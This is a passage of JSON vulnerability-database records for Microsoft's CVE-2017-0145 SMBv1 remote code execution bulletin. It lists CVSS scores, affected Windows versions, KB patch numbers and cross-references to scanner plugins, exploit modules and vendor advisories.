"THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": 
["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-08T16:54:43", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-08T16:54:43", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012598", "KB4012216", "KB3205401", "KB3205409", "KB4012215", "KB4012212", "KB3177186", "KB4013429", "KB3212646", "KB3210721", "KB4014077", "KB4012213", "KB3210720", "KB3213986", "KB4013198", "KBMS16-110, 3187754", "KB4012214", "KB4012217", "KB4012606"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": 
"", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", 
"kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-08T16:54:43", "differentElements": ["msAffectedSoftware"], "edition": 22}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-09T05:02:02", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", 
"MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", 
"RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-08T16:54:43", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-08T16:54:43", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3213986", "KB4012213", "KB3177186", "KB3205409", "KBMS16-110, 3187754", "KB4013198", "KB3210721", "KB3212646", "KB4012214", "KB4012606", "KB3210720", "KB4014077", "KB4012216", "KB4012217", "KB4012215", "KB4012598", "KB3205401", "KB4012212", "KB4013429"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core 
installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": 
"KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": 
"KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for 
x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 
Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-09T05:02:02", "differentElements": ["msAffectedSoftware"], "edition": 23}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", 
"availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-09T06:50:25", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": 
["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-09T06:50:25", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-09T06:50:25", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205409", "KB4012214", "KB4012217", "KB4012216", "KB4013198", "KB3212646", "KBMS16-110, 3187754", "KB4012215", "KB3210721", "KB3177186", "KB4012598", "KB3205401", "KB4014077", "KB4013429", "KB4012213", "KB4012606", "KB3213986", "KB3210720", "KB4012212"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
